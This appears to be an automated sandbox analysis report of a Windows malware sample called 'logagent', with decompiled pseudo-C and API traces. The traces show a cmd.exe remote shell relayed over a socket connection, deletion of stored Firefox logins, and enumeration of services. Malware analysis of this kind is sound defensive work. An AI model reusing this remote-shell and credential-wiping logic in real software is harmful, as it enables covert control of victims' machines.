                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                  • String ID:
                                  • API String ID: 2968164691-0
                                  • Opcode ID: 718ddcdb58c9dca260901cbdca20190fc0c08979b4ccda9be22cf8766a527973
                                  • Instruction ID: 811b7e3e4f446b35303200f11341a1ba311440e0dd0279f7ab7bb97a8af00616
                                  • Opcode Fuzzy Hash: 718ddcdb58c9dca260901cbdca20190fc0c08979b4ccda9be22cf8766a527973
                                  • Instruction Fuzzy Hash: C3B11D72D0050DEBCB04EBA0EC59EEEB77CAF54345F148066F516A30A1EB745A89CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00402B8A(char _a4) {
                                  				char _v5;
                                  				char _v6;
                                  				char _v7;
                                  				char _v8;
                                  				char _v9;
                                  				void _v16;
                                  				signed int _v20;
                                  				long _v24;
                                  				long _v28;
                                  				void* _v44;
                                  				char _v60;
                                  				char _v76;
                                  				char* _t54;
                                  				int _t68;
                                  				void* _t79;
                                  				CHAR* _t80;
                                  				int _t91;
                                  				signed int _t120;
                                  				void* _t136;
                                  				CHAR* _t142;
                                  				void* _t146;
                                  
                                  				if(( *0x41b85c & 0x00000001) != 0) {
                                  					_t142 = 0;
                                  				} else {
                                  					 *0x41b85c =  *0x41b85c | 0x00000001;
                                  					_t142 = 0;
                                  					E00402010(0x41b800, 0);
                                  					E00413E72(E00402F89);
                                  				}
                                  				if(( *0x41b85c & 0x00000002) == 0) {
                                  					 *0x41b85c =  *0x41b85c | 0x00000002;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  					E00413E72(E00402F7E);
                                  				}
                                  				_t50 =  &_v5;
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t50);
                                  				_v20 = _v20 | 0xffffffff;
                                  				_v16 = _t142;
                                  				if( *0x41b888 != 0) {
                                  					L12:
                                  					_v24 = _t142;
                                  					PeekNamedPipe( *0x41b858, _t142, _t142, _t142,  &_v24, _t142);
                                  					if(_v24 <= _t142) {
                                  						_t146 = _t146 - 0x10;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v9);
                                  						_t54 = E004020C2(0x41b800, 0x62, 0x415664);
                                  						_v20 = _t54;
                                  					} else {
                                  						_t136 = malloc(_v24);
                                  						_t54 = ReadFile( *0x41b858, _t136, _v24,  &_v28, _t142);
                                  						if(_v28 > _t142) {
                                  							if(_v16 <= _t142) {
                                  								L18:
                                  								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v7);
                                  								_t146 = _t146 - 0x10;
                                  								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_t142, _v28,  &_v8);
                                  								_t54 = E004020C2(0x41b800, 0x62,  &_v76);
                                  								_v20 = _t54;
                                  							} else {
                                  								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  								_t68 = strncmp(_t136, _t54, _v16);
                                  								_t146 = _t146 + 0xc;
                                  								if(_t68 != 0) {
                                  									goto L18;
                                  								} else {
                                  									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v5);
                                  									_t146 = _t146 - 0x10;
                                  									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_v16, _v28 - _v16,  &_v6);
                                  									_t54 = E004020C2(0x41b800, 0x62,  &_v60);
                                  									_v20 = _t54;
                                  								}
                                  							}
                                  							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						}
                                  						free(_t136);
                                  					}
                                  					goto L22;
                                  				} else {
                                  					__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(0x41b860, "cmd.exe");
                                  					if(_t50 == 0) {
                                  						L11:
                                  						if( *0x41b888 != 0) {
                                  							do {
                                  								goto L12;
                                  								L22:
                                  								if(_v20 == 0xffffffff) {
                                  									 *0x41b889 =  *0x41b889 & 0x00000000;
                                  								}
                                  								__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  								if(_t54 <= 0) {
                                  									_v16 = _t142;
                                  								} else {
                                  									__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415770);
                                  									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(0x41b860);
                                  									__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  									WriteFile( *0x41b870,  &_v16,  &_v16,  &_v16, _t142);
                                  									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                  								}
                                  								Sleep(0x64);
                                  							} while ( *0x41b889 != 0);
                                  							TerminateProcess(0x41b878->hProcess, _t142);
                                  							CloseHandle( *0x41b87c);
                                  							_t50 = CloseHandle( *0x41b878);
                                  						}
                                  						E004020F4(_t50, 0x41b800);
                                  						CloseHandle( *0x41b858);
                                  						CloseHandle( *0x41b874);
                                  						 *0x41b888 =  *0x41b888 & 0x00000000;
                                  						_t91 = 1;
                                  					} else {
                                  						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(getenv("SystemDrive"));
                                  						__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415774);
                                  						0x41b7f0->nLength = 0xc;
                                  						 *0x41b7f8 = 1;
                                  						 *0x41b7f4 = _t142;
                                  						if(CreatePipe(0x41b7a0, 0x41b870, 0x41b7f0, _t142) == 0 || CreatePipe(0x41b858, 0x41b874, 0x41b7f0, _t142) == 0) {
                                  							_t91 = 0;
                                  						} else {
                                  							_t120 = 0x11;
                                  							memset(0x41b7a8, 0, _t120 << 2);
                                  							_t79 =  *0x41b7a0; // 0x0
                                  							 *0x41b7e0 = _t79;
                                  							_t80 =  *0x41b874; // 0x0
                                  							0x41b7a8->cb = 0x44;
                                  							 *0x41b7d4 = 0x101;
                                  							 *0x41b7d8 = _t142;
                                  							 *0x41b7e4 = _t80;
                                  							 *0x41b7e8 = _t80;
                                  							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  							 *0x41b888 = CreateProcessA(_t142, _t80, _t142, _t142, 1, _t142, _t142, _t80, 0x41b7a8, 0x41b878) & 0xffffff00 | _t81 != 0x00000000;
                                  							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
                                  							 *0x41b889 = 1;
                                  							E00402038(0x41b800);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							E0040209B(0x41b800, 0x415664);
                                  							_t146 = _t146 + 0xc;
                                  							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  							_v20 = E004020C2(0x41b800, 0x93,  &_a4);
                                  							Sleep(0x12c);
                                  							_t142 = 0;
                                  							goto L11;
                                  						}
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t91;
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                  • getenv.MSVCRT ref: 00402C34
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                  • CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                  • CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                  • CreateProcessA.KERNEL32(00000000,00000000), ref: 00402D0E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402D25
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • Sleep.KERNEL32(0000012C,00000093), ref: 00402D71
                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402D97
                                  • malloc.MSVCRT ref: 00402DA9
                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402DC1
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402DDB
                                  • strncmp.MSVCRT(00000000,00000000), ref: 00402DE3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402DF8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?), ref: 00402E15
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402E3B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?), ref: 00402E52
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000062), ref: 00402E67
                                  • free.MSVCRT(00000000), ref: 00402E6E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00402E85
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402D57
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000062), ref: 00402EAB
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415770), ref: 00402EBC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0041B860), ref: 00402ECA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00402ED7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402EE0
                                  • WriteFile.KERNEL32(00000000), ref: 00402EED
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402EFA
                                  • Sleep.KERNEL32(00000064), ref: 00402F07
                                  • TerminateProcess.KERNEL32(00000000), ref: 00402F21
                                  • CloseHandle.KERNEL32 ref: 00402F33
                                  • CloseHandle.KERNEL32 ref: 00402F3B
                                  • CloseHandle.KERNEL32 ref: 00402F52
                                  • CloseHandle.KERNEL32 ref: 00402F5A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F71
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$D@1@@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseHandle$CreatePipeV01@@$?length@?$basic_string@FileProcessSleepY?$basic_string@$??8std@@D@2@@0@NamedPeekReadTerminateV?$basic_string@Writeconnectfreegetenvmallocstrncmp
                                  • String ID: SystemDrive$cmd.exe
                                  • API String ID: 1882443052-3633465311
                                  • Opcode ID: 798ad6d736d95c7b07d7848c9617aa5a37f0631a69e3a682c11b69c6be7a4bd8
                                  • Instruction ID: 0121bb856768c0d2b30f6d73f3edf8f7852bc9241180a475d7ad49acf624a365
                                  • Opcode Fuzzy Hash: 798ad6d736d95c7b07d7848c9617aa5a37f0631a69e3a682c11b69c6be7a4bd8
                                  • Instruction Fuzzy Hash: 97B1A531A40209EFCB01AB61DD4DAEE7FB9EB84750F14803AF911A61E0CBB84945DBDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,761B6490,00000000), ref: 004072A1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                  • getenv.MSVCRT ref: 004072D9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                  • API String ID: 3375041920-3681987949
                                  • Opcode ID: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction ID: c62cee961eeb0feb44b1f04b02d1ffc3ba69f98c32627a35338bed2311f0f042
                                  • Opcode Fuzzy Hash: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction Fuzzy Hash: 69712E71C0460EEBCB009BE0DC59DEEBF78AF55355F004176E812E31A0EB74668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,0041B320), ref: 00411408
                                  • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,?,00000000,?,00410E95,?), ref: 00411438
                                  • GetLastError.KERNEL32 ref: 00411442
                                  • malloc.MSVCRT ref: 00411458
                                  • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,?,?,00410E95,?), ref: 00411477
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041149B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114A9
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114BE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114CA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 004114DB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114E8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114F4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114FD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411509
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041151A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@$??1?$basic_string@$EnumG@2@@0@Hstd@@ServicesStatusV01@V01@@V10@@V?$basic_string@Y?$basic_string@$ErrorLastManagerOpenmalloc
                                  • String ID:
                                  • API String ID: 2829549728-0
                                  • Opcode ID: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                  • Instruction ID: fe864d2e3db6e374d855c0a4c4208b99666831e449a430f346264da0072ddcf9
                                  • Opcode Fuzzy Hash: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                  • Instruction Fuzzy Hash: 5EA1E672C0051AEBCB15DBA0EC98EEEBB78FF58305F04806AF516A2160EB755A45CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,761B6490,00000000), ref: 0040752D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                  • getenv.MSVCRT ref: 00407558
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
